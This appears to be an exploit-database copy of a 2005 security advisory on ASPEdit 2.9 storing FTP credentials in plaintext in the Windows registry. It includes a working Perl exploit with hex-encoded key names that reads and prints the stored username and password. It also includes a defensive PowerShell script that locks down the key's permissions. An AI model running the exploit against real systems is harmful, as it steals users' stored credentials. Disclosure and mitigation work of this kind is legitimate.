ASPEdit FTP Password Disclosure

CVE: CVE-2004-2477
Category: CWE-200
Price: $500
Severity: High
Author: Tom Ferris
Risk: High
Exploitation Type: Remote
Date: 2005-10-06
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090030

Below is a copy:

Version:
ASPEdit  2.9

Operating System:
- All Windows

Typical software:
- Shareware

Severity Flaw:
- high

Description:
ASPEdit is a powerful Active Server Pages and HTML editor with full support for Visual Basic Script, Perl, ColdFusion, PHP3, MIVA, HDML, WML and style sheets.

Vulnerability:
The stored administration password is visible in the Registry Editor. A local user or guest who has the privilege to open the Registry Editor could see and then retrieve the password by searching for the specific vulnerable registry values.

Exploit:
#!/usr/bin/perl
#
# ASPEdit FTP Password Disclosure Exploit
# ---------------------------------------
#   Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.tashcom.co.uk/aspedit
#


use Win32::Registry;

print "\nASPEdit FTP Password Disclosure Exploit\n";
print "---------------------------------------\n\n";
print "Registry: HKLM\\SOFTWARE\\tashcom\\aspedit\\ftp\n";
sleep(1);

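# Registry value names, hex-escaped by the author.
$usr = "\x66\x74\x70\x5f\x75\x73\x65\x72";              # decodes to "ftp_user"
$pas = "\x66\x74\x70\x5f\x70\x61\x73\x73\x77\x6f\x64";  # decodes to "ftp_passwod" as written

# Key path under HKEY_LOCAL_MACHINE; decodes to SOFTWARE\\tashcom\\aspedit\\ftp
# (each \x5c is one backslash, so the separators are doubled in the string).
$nutt =
"\x53\x4f\x46\x54\x57\x41\x52\x45\x5c\x5c".
"\x74\x61\x73\x68\x63\x6f\x6d\x5c\x5c\x61".
"\x73\x70\x65\x64\x69\x74\x5c\x5c\x66\x74\x70";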

print "[+] Start searching..\n";
print "[+] Finding username ..";
my $user;
$::HKEY_LOCAL_MACHINE->Open("$nutt", $user)
or die "Can't open username value: $^E";
sleep(1);
print "[OK]\n";
print "[+] Query value username..";
my ($type, $value);
$user->QueryValueEx("$usr", $type, $value) or die "No such user: $^E";
sleep(1);
print "[OK]\n";

print "[+] Finding password ..";
my $pass;
$::HKEY_LOCAL_MACHINE->Open("$nutt", $pass)
or die "Can't open password value: $^E";
sleep(1);
print "[OK]\n";
print "[+] Query value password..";
my ($type1, $value2);
$pass->QueryValueEx("$pas", $type1, $value2) or die "No such password: $^E";
sleep(2);
print "[OK]\n";
print "[+] Retrive data registry..\n";
sleep(1);
print "[*] User: $value\n";
print "[*] Password: $value2\n";

Solution:
In the Registry Editor, change the registry path, then try to encrypt
the password; it is safer.
Also set permissions on them (Advanced Security Settings), which can be found
by right-clicking the key or value and then choosing 'Permissions'.
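
The permission change described in the solution, scripted in PowerShell as an added example (not part of the original advisory or the vendor's software): it lists the value names and current ACL of the key, and with -Apply replaces the ACL so that only Administrators, SYSTEM and one named account can reach it. The $AppUser default and the rights granted to that account are assumptions; run it from an elevated prompt.

```powershell
# Added example (not from the advisory): audit and optionally restrict the key's ACL.
# On 64-bit Windows a 32-bit program's HKLM\SOFTWARE keys live under WOW6432Node;
# pass that path with -KeyPath if the key is found there instead.
param(
    [string]$KeyPath = 'HKLM:\SOFTWARE\tashcom\aspedit\ftp',  # path printed by the advisory
    [string]$AppUser = "$env:USERDOMAIN\$env:USERNAME",       # assumption: account that runs ASPEdit
    [switch]$Apply                                            # without it, report only
)

if (-not (Test-Path -Path $KeyPath)) { Write-Output "Key not present: $KeyPath"; return }

# Value names only; the stored data is deliberately not printed.
Write-Output "Values under the key: $((Get-Item -Path $KeyPath).Property -join ', ')"

# Who can currently reach the key, and whether each rule is inherited.
$acl = Get-Acl -Path $KeyPath
$acl.Access |
    Format-Table IdentityReference, RegistryRights, AccessControlType, IsInherited -AutoSize |
    Out-Host

if (-not $Apply) { return }

# Stop inheriting from the parent key and discard the inherited rules.
$acl.SetAccessRuleProtection($true, $false)
# Drop every explicit rule so that only the three added below remain.
foreach ($rule in @($acl.Access | Where-Object { -not $_.IsInherited })) {
    $acl.PurgeAccessRules($rule.IdentityReference)
}

# Well-known SIDs avoid localized group names.
$admins = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'  # Administrators
$system = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-18'      # SYSTEM
$user   = New-Object System.Security.Principal.NTAccount $AppUser

$full = [System.Security.AccessControl.RegistryRights]::FullControl
# Assumption: the editor needs to read and update its saved FTP settings.
$rw   = [System.Security.AccessControl.RegistryRights]'ReadKey, SetValue'

foreach ($grant in @(@($admins, $full), @($system, $full), @($user, $rw))) {
    $rule = New-Object System.Security.AccessControl.RegistryAccessRule(
        $grant[0], $grant[1], 'ContainerInherit', 'None', 'Allow')
    $acl.AddAccessRule($rule)
}
Set-Acl -Path $KeyPath -AclObject $acl

# Show the resulting rules for verification.
(Get-Acl -Path $KeyPath).Access |
    Format-Table IdentityReference, RegistryRights, AccessControlType, IsInherited -AutoSize |
    Out-Host
```

The account named in $AppUser can still read the stored values, so this limits exposure to other local users and guests rather than removing the plaintext storage.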

Vendor URL:
Mail - [email protected] 
WWW - http://www.tashcom.com

Published:
basher13 (Infam0us Gr0up - Securiti Research)
[email protected] / infamous.2hell.com
